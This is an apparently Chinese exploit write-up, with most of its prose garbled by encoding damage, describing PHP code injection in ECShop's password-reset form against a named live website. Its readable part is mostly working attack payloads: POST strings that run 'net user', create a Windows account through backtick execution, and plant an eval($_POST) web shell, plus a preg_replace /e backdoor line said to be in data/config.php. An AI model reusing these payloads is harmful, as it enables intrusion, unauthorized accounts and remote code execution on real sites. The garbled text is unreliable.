ecshopԶ̴ִ©

Php code injection
 Target:http://www.cunlide.com/վ
 ecshop 汾 ò09
 awvs ɨ֮sqlע롢php code injectionȵȶ©
 ʼexp ޹
 Php code injection Ҫpostύô
 system Ȩ
  act=forget_pwd&action=get_pwd&email=${@print(system(net user))}&user_name=furybijj
 ޹
 
˵ȥsystem֮%60
 
 act=forget_pwd&action=get_pwd&email=$%7B@print(%60net user SUPPORT_388945a1 lifelongz%60)%7D&user_name=furybijj
 ϳɹ
 
ʵҲֱò˵ connect.
 
д£
 
 <O>act=forget_pwd&action=get_pwd&email=${eval($_POST[test])}&user_name=furybijj</O>
 Ҫô£
  act=forget_pwd&action=get_pwd&email=%24%7b%40print%28%60net%20user%60%29%7d&user_name=furybijj
 
 act=forget_pwd&action=get_pwd&email=%24%7b%40eval%28%24_POST%5bfuck%5d%29%7d&user_name=furybijj
 ©ԭ
 
data/config.php
  define(EC_CHARSET,'utf-8);
 @preg_replace(/[email]/e,$_POST['email'],error);# 
